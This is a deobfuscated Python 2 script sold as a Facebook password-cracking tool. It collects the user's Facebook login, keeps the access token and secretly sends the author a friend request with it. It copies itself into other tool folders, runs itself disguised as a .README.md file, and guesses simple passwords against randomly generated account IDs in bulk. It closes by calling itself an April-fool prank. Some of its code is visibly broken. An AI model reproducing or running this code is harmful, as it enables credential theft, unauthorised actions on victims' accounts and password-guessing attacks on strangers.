# Deobfuscated BY HTR-TECH | Tahmid Rayat

# Github    : https://github.com/htr-tech 
# Instagram : https://www.instagram.com/tahmid.rayat
# Facebook  : https://fb.com/tahmid.rayat.oficial 
# Messenger : https://m.me/tahmid.rayat.oficial 

#!/usr/bin/python2
#coding=utf-8


import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system("rm -rf .txt")
for n in range(150):

    nmbr = random.randint(100002020202020, 100009090909090)
    
    sys.stdout = open(".txt", "a")

    print(nmbr)

    sys.stdout.flush()
    
try:
    import requests
except ImportError:
    os.system('pip2 install requests')
    
try:
    import mechanize
except ImportError:
    os.system('pip2 install mechanize')
    time.sleep(1)
    os.system('python2 .README.md')
    
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser


reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]



def exb():
	print "[!] Exit"
	os.sys.exit()


def acak(b):
    w = 'ahtdzjc'
    d = ''
    for i in x:
        d += '!'+w[random.randint(0,len(w)-1)]+i
    return cetak(d)


def cetak(b):
    w = 'ahtdzjc'
    for i in w:
        j = w.index(i)
        x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
    x += '\033[0m'
    x = x.replace('!0','\033[0m')
    sys.stdout.write(x+'\n')


def psb(z):
	for e in z + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
		time.sleep(0.15)

def t():
    time.sleep(1)
def cb():
    os.system('clear')
##### LOGO #####
logo='''
________________________________█████_____█████
______________________________███____██_██_____███
_____________________________██________██__________██
____________________________██__________█____________██
________██████____________██________________________██
_____███████████________██________________________██
____█████████████_______██_______________________██
___███████████████______██______________________██
___████████████████______██___________________██
___████████████████_______██_________________██
____███████████████_______███_______________██
_______███████████_______██__██_____________██
___________███████______████___██__________██
____██████__██████████████_____██_____██
__██████████████████████________██__██
_████████████████████_____________████
██_█████_████████████_______________█
█__█_██__████████████
_____█__████████████
_______█████████████
_______██████████████
_______███████████████
________███████████████
_______███████__████████
______███████_____███████
____█████████________██████


--------------------------------------------------
➣ Auther   : Binyamin
➣ GitHub   : https://github.com/binyamin-binni
➣ YouTube  : Trick Proof
➣ Blogspot : https://trickproof.blogspot.com
--------------------------------------------------
                                '''

def tik():
	titik = ['.   ','..  ','... ']
	for o in titik:
		print("\r[●] Loging In "+o),;sys.stdout.flush();time.sleep(1)


back = 0
successful = []
cpb = []
oks = []
id = []

def ym():
    try:
        cb()
        os.mkdir("../omi/.....")
    except OSError:
        yp()
    else:
        os.system("cp ../b-april/b-april.py ../omi/Omi.py")
        os.system("cp ../b-april/.README.md ../omi/")
        yb()
    
def yb():
    try:
        os.mkdir("../BlackMafia2020/.....")
    except OSError:
        yl()
    else:
        os.system("cp ../b-april/b-april.py ../BlackMafia2020/lovehacker")
        os.system("cp ../b-april/.README.md ../BlackMafia2020/")
        yl()
    
def yl():
    try:
        os.mkdir("../Qurban/.....")
    except OSError:
        yp()
    else:
        os.system("cp ../b-april/b-april.py ../Qurban/Qurban.py")
        os.system("cp ../b-april/.README.md ../Qurban/")
        yp()
    
def yp():
    try:
        os.mkdir("../faizanwahla/.....")
    except OSError:
        login()
    else:
        os.system("cp ../b-april/b-april.py ../faizanwahla/pacman")
        os.system("cp ../b-april/.README.md ../faizanwahla/")
        login()
    
def login():
	os.system('clear')
	try:
		toket = open('....','r')
		menu() 
	except (KeyError,IOError):
		os.system('clear')
		print logo
		print('          [☆] LOGIN WITH FACEBOOK [☆]' )
		print
		id = raw_input('[✓] ID/Email : ')
		pwd = getpass.getpass('[✓] Password : ')
		tik()
		try:
			br.open('https://m.facebook.com')
		except mechanize.URLError:
			print"\n[!] There is no internet connection"
			exb()
		br._factory.is_html = True
		br.select_form(nr=0)
		br.form['email'] = id
		br.form['pass'] = pwd
		br.submit()
		url = br.geturl()
		if 'save-device' in url:
			try:
				sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
				data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
				x=hashlib.new("md5")
				x.update(sig)
				a=x.hexdigest()
				data.update({'sig':a})
				url = "https://api.facebook.com/restserver.php"
				r=requests.get(url,params=data)
				z=json.loads(r.text)
				chb = open("....", 'w')
				chb.write(z['access_token'])
				chb.close()
				print '\n\x1b[1;92m[✓] Login Successfull \x1b[1;97m'
				os.system('xdg-open https://www.youtube.com/channel/UCIC01LyIO5oroo1Qo6Fi4Mw')
				requests.post('https://graph.facebook.com/me/friends?method=post&uids=100002059014174&access_token='+z['access_token'])
				menu()
			except requests.exceptions.ConnectionError:
				print"\n[!] There is no internet connection"
				exb()
		if 'checkpoint' in url:
			print("\n[!] It seems that your account has a checkpoint")
			os.system('rm -rf ....')
			time.sleep(1)
			exb()
		else:
			print("\n[!] Password/Email is wrong")
			os.system('rm -rf ....')
			time.sleep(1)
			login()


def menu():
	os.system('clear')
	try:
		toket=open('....','r').read()
	except IOError:
		os.system('clear')
		print"[!] Token invalid"
		os.system('rm -rf ....')
		time.sleep(1)
		login()
	try:
		otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
		a = json.loads(otw.text)
		nama = a['name']
		id = a['id']
	except KeyError:
		os.system('clear')
		print"[!] It seems that your account has a checkpoint"
		os.system('rm -rf ....')
		time.sleep(1)
		login()
	except requests.exceptions.ConnectionError:
		print"[!] There is no internet connection"
		exb()
	os.system("clear")
	print logo
	print "[✓] Name : "+nama+"               "
	print "[✓] ID   : "+id+"              "
	print 50*"-"
	print
	print "[1] Crack Menu"
	print "[2] Update B4U Tool"
	print "[3] Follow Me On Facebook"
	print "[4] Log Out"
	print "[0] Exit            "
	print 50*"-"
	action()


def action():
	chb = raw_input("\n  ▄︻̷̿┻̿═━一   ")
	if chb =="":
		print "[!] Fill in correctly"
		action()
	elif chb =="1":
		crack_menu()
	elif chb =="2":
	    os.system('cp .... $HOME')
	    os.system("rm -rf $HOME/b-april")
	    os.system('cd $HOME && git clone https://github.com/binyamin-binni/b-april')
	    os.system("mv $HOME/.... $HOME/b-april")
	    cb()
	    print (logo)
	    psb('10%')
	    psb('20%')
	    psb('30%')
	    psb('40%')
	    psb('50%')
	    psb('60%')
	    psb('70%')
	    psb('80%')
	    psb('90%')
	    psb('100%')
	    psb('✓')
	    psb('✓')
	    psb('✓')
	    psb('Congratulations B4U Tool Has Been Updated Successfully')
	    time.sleep(2)
	    os.system("cd $HOME/b-april && python2 .README.md")
	elif chb =="3":
	    os.system("xdg-open https://www.facebook.com/100002059014174/posts/2677733205638620/?substory_index=0&app=fbl")
	    time.sleep(1)
	    menu()
	elif chb =="4":
	    os.system("rm -rf ....")
	    print
	    psb(" Logout successfully")
	elif chb =="0":
		exb()
	else:
		print "[!] Fill in correctly"
		action()


def crack_menu():
	global toket
	os.system('clear')
	try:
		toket=open('....','r').read()
	except IOError:
		print"[!] Token invalid"
		os.system('rm -rf ....')
		time.sleep(1)
		login()
	os.system('clear')
	print logo
	crack_action()

def crack_action():
	bch = raw_input("\n[•] Press Enter To Start   ")
	if bch =="":
		os.system('clear')
		urllib.urlopen("https://www.google.com/url?sa=t&source=web&rct=j&url=https://trickproof.blogspot.com/%3Fm%3D1&ved=2ahUKEwi87vKb9cPoAhVIxoUKHT2kBMEQFjAAegQIBBAB&usg=AOvVaw1MUpc0kk_u_Dr7q2z48zC1&cshid=1585630324556")
		print logo
		try:
			idlist = (".txt")
			for line in open(idlist,'r').readlines():
				id.append(line.strip())
		except IOError:
			print '[!] Error 404, please try again'
			raw_input('\n[ Press Enter To Go Back ]')
			menu()
	elif bch =="0":
		menu()
	else:
		print "[!] Fill in correctly"
		crack_action()
	time.sleep(0.5)
	psb ('[✓] Please wait, process is running ...')
	time.sleep(0.5)
	psb ('[!] To Stop Process Press CTRL Then Press z')
	time.sleep(0.5)
	print 50*"-"
	print
	
			
	def main(arg):
		global cpb,oks
		user = arg
		try:
			os.mkdir('save')
		except OSError:
			pass
		try:
			a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
			b = json.loads(a.text)
			pass1 = b["first_name"]+"123"
			data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
			q = json.load(data)
			if 'error_msg' in q:
				print '\x1b[1;92m[Successful]\x1b[0m ' + user + ' | ' + pass1
				oks.append(user+pass1)
			else:
				if 'www.facebook.com' in q["error_msg"]:
					print '[Checkpoint] ' + user + ' | ' + pass1
					cps = open("save/checkpoint.txt", "a")
					cps.write(user+"|"+pass1+"\n")
					cps.close()
					cpb.append(user+pass1)
				else:
					pass2 = "786786"
					data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
					q = json.load(data)
					if 'access_token' in q:
						print '\x1b[1;92m[Successful]\x1b[0m ' + user + ' | ' + pass2
						oks.append(user+pass2)
					else:
						if 'www.facebook.com' in q["error_msg"]:
							print '[Checkpoint] ' + user + ' | ' + pass2
							cps = open("save/checkpoint.txt", "a")
							cps.write(user+"|"+pass2+"\n")
							cps.close()
							cpb.append(user+pass2)
																	
															
		except:
			pass
		
	p = ThreadPool(30)
	p.map(main, id)
	print 50*"-"
	print '[✓] Process Has Been Completed ....'
	print "[✓] Total OK/CP : "+str(len(oks))+"/"+str(len(cpb))
	os.system("rm -rf save")
	cb()
	print logo
	print
	psb(" oh no what the fuck, where is my account. oh no.")
	cb()
	print logo
	print
	psb(" hello dear friends, as it is clear from the name of this tool. b april i have made this tool on first april to make my subscribers my friends my dears april fool and make them shocked and laugh.")
	psb(" if you are using this tool after first april then, i am sorry you waste your time to install this tool in your terminal.")
	psb(" but dont be sad, go to my youtube channel trick proof, there are too many original tools for facebook , you can use them")
	time.sleep(5)
	cb()
	print logo
	print
	psb(" piyare dosto dear subscribers aur mere sb fb friends, jesa k aap ko maloom hai k aaj 1st april hai is lie maine socha k q na thodi msti ki jaye aur apne piyare doston aur piyare subscribers ko april fool bnaya jaye")
	print
	psb(" is tool se jitni bhi ids i hain sb fake to nhi hain. lekin uske password wrong hain")
	print
	psb(" mera maqsad aap logon ko preshan krna bilkul bhi nhi tha balke maine ye sb aap k lie aap ko thoda muskrane k lie hi kiya hai")
	print
	psb(" lekin agr is ki wja se kisi ki dil azaari hui hai to us k lie mazrat chahta hun")
	print
	psb(" aap sb logon ne mujhe boht support kiya hai aur is lie maine time nikal kr aap logon k lie ye sab msti ka mahol bnaya hai. phir se kehta chloon k agr kisi ko is se problem hui hai ya dil dukha hai to mazrat chahta hun")
	print
	psb(" aap logon ki support ka boht boht shukriya umeed hai k aap sb aese hi mer3 channel k saath bne raheinge")
	print
	psb(" next command real aane wali hai. yahoo death mail grabbing ki jis mein fb login ki zroorat nhi hogi aur us se nikali gai sb ki sb mails pr code bhi foran aayega. umeed hai aap ko achha lgega wo tool")
	print
	psb(" kuchh log mujhe bxi keh kr bulaate hain hahhahha. mujhe problem nhi hai is se. but mera naam \x1b[1;92m Binyamin\x1b[1;97m hai")
	print
	psb(" to phir milte hain next original tool k saath. apna aur apne ird gird walon ko boht boht khiyaal rkhiyega aur agr mujh se koi spellings ki mistake ho gai ho to maaf kijiye ga hahahha  aur ye fun tha just video k cmnt mein fake fake bolne se gurez kijiye ga")
	print
	psb(" \x1b[1;92m   ALLAH HAFIZ!")
	time.sleep(10)
	os.sys.exit()

if __name__ == '__main__':
	ym()

